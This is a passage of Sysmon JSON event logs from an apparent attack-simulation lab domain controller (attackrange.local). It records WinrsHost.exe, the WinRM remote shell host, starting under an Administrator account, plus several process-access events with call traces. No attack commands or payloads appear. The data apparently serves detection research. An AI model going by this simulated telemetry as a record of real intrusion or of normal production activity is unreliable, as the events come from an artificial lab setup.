MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.741","ProcessGuid":"{A837DB8D-01DD-5F25-0000-001018530400}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-01D3-5F25-0000-0020A33A0400}","LogonId":"0x43aa3","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{A837DB8D-01B5-5F25-0000-0010B4650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2402,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-001018530400}\r\nTargetProcessId: 3384\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-001018530400}","TargetProcessId":"3384","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2403,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.734\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-001018530400}\r\nTargetProcessId: 3384\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.734","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-001018530400}","TargetProcessId":"3384","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2404,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2405,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2406,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2407,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2408,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2409,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedT